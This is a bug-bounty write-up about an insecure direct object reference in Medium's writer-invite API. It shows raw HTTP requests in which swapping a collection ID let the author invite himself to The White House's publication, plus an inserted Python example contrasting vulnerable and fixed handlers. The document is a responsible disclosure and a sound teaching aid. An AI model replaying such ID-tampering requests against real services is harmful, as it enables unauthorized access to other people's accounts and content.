*Image from [http://www.wellesley.edu](http://www.wellesley.edu/sites/default/files/assets/dailyshot/2016/collegereporter_b_tablet.jpg)*

While I was riding home with an Uber, I received an email from Medium about its 5 new features. One of those is the **_Invite Writers_** feature.

*Email from Medium*

New features mean there is a possibility of new [security](https://hackernoon.com/tagged/security) issues, so I started testing the feature by inviting my second email to my own publication to see how it works. While going through the invite process, I opened a tool and intercepted the [HTTP](https://hackernoon.com/tagged/http) POST request. This is what I got:

```http
POST /_/api/collections/62fcbc0a9209/invited-authors HTTP/1.1
Host: medium.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Obvious-CID: web
X-XSRF-Token: NDZnMsyhRddws0sV
X-Client-Date: 1479216955226
Content-Type: application/json
Referer: https://medium.com/secuna/edit
Content-Length: 41
Cookie: {Redacted}
Connection: close

{"email":"example@domain.com"}
```

Look at the top line of the request and find the value after `/collections/`. **_62fcbc0a9209_** is the Collection ID of [Secuna](https://blog.secuna.ph/), and it quickly reminded me that this kind of request is possibly vulnerable to [Insecure Direct Object Reference](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29), also known as [IDOR](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29): the server trusts the object identifier in the URL without checking that the logged-in user is actually allowed to manage that object. So, without hesitation, I searched for The White House’s Medium publication and grabbed its Collection ID.
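To make the missing check concrete, here is an added example (not Medium’s code, and not part of the original post) that models the invite endpoint twice: once the way the bug suggests it behaved, and once with the object-level authorization check that stops it. The names `Collection`, `make_store`, `invite_author_vulnerable`, `invite_author_fixed` and `probe_idor`, the user IDs, and the in-memory store are all assumptions for illustration; only the two collection IDs come from the write-up.

```python
# Added example, not Medium's code: a minimal model of an "invite writer"
# endpoint showing the missing check behind the IDOR described above.
# All names (Collection, make_store, invite_author_*) and the sample data
# are assumptions for illustration.
from dataclasses import dataclass, field
from typing import Dict, List, Set


class Forbidden(Exception):
    """Caller is not logged in."""


class NotFound(Exception):
    """Collection does not exist (or, in the fixed handler, is not the caller's)."""


@dataclass
class Collection:
    collection_id: str
    editor_ids: Set[str]                           # users allowed to manage writers
    invited: List[str] = field(default_factory=list)


def make_store() -> Dict[str, Collection]:
    """Constructed sample data: the two collection IDs from the write-up,
    each owned by a different (hypothetical) user."""
    return {
        "62fcbc0a9209": Collection("62fcbc0a9209", editor_ids={"secuna"}),
        "51210352003f": Collection("51210352003f", editor_ids={"whitehouse"}),
    }


def invite_author_vulnerable(store, user_id, collection_id, email):
    """POST /_/api/collections/<collection_id>/invited-authors as the bug
    suggests it behaved: the caller must be logged in and the collection
    must exist, but nothing ties the caller to the collection in the URL.
    Returns the HTTP status code."""
    if not user_id:
        raise Forbidden("login required")
    coll = store.get(collection_id)
    if coll is None:
        raise NotFound(collection_id)
    coll.invited.append(email)
    return 200


def invite_author_fixed(store, user_id, collection_id, email):
    """Same endpoint with an object-level authorization check: the caller
    must be an editor of the specific collection named in the URL."""
    if not user_id:
        raise Forbidden("login required")
    coll = store.get(collection_id)
    if coll is None or user_id not in coll.editor_ids:
        # One error for "does not exist" and "not yours", so the endpoint
        # cannot be used to enumerate valid collection IDs.
        raise NotFound(collection_id)
    coll.invited.append(email)
    return 200


def probe_idor(handler, attacker_id, victim_collection_id):
    """Offline version of the test in the write-up: replay the invite as a
    logged-in user who is NOT an editor of victim_collection_id. Returns
    True when the invite lands, i.e. the handler is vulnerable."""
    store = make_store()
    email = "attacker@example.com"
    try:
        handler(store, attacker_id, victim_collection_id, email)
    except (Forbidden, NotFound):
        return False
    return email in store[victim_collection_id].invited


if __name__ == "__main__":
    print("vulnerable:", probe_idor(invite_author_vulnerable, "secuna", "51210352003f"))
    print("fixed:     ", probe_idor(invite_author_fixed, "secuna", "51210352003f"))
```

The point of `probe_idor` is the same as the manual test in the post: log in as one account, swap in another publication’s ID, and see whether the server accepts it. Any endpoint that takes an object ID from the client needs the check in `invite_author_fixed`, not just a login check.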
The White House’s Collection ID: `51210352003f`

After grabbing The White House’s Collection ID, I modified the HTTP POST request, changing the Collection ID from my publication’s to The White House’s:

```http
POST /_/api/collections/51210352003f/invited-authors HTTP/1.1
Host: medium.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Obvious-CID: web
X-XSRF-Token: NDZnMsyhRddws0sV
X-Client-Date: 1479216955226
Content-Type: application/json
Referer: https://medium.com/secuna/edit
Content-Length: 41
Cookie: {Redacted}
Connection: close

{"email":"example@domain.com"}
```

Then I submitted the request above and got a **_200 OK_** HTTP response, which meant I had successfully invited myself as a writer for The White House’s Medium publication. After 3 seconds, I got an email from Medium with an invitation link.

*Invitation Link from The White House*

And Wee!

After I found this severe security issue, I immediately reported it to Medium’s security team. In just 9 hours, they fixed it and rewarded me with a $250 bounty. I’m happy yet a little sad at the same time, because they removed me from The White House’s Medium publication. (haha)

Seriously, I am so happy because I helped Medium again make their platform more secure by finding and reporting security vulnerabilities. I’m also the one who found a bug that allowed anyone to [update and delete any story on Medium.](https://hackernoon.com/update-and-delete-any-story-of-any-user-on-medium-8b6a609c9bbe#.15gz819kf)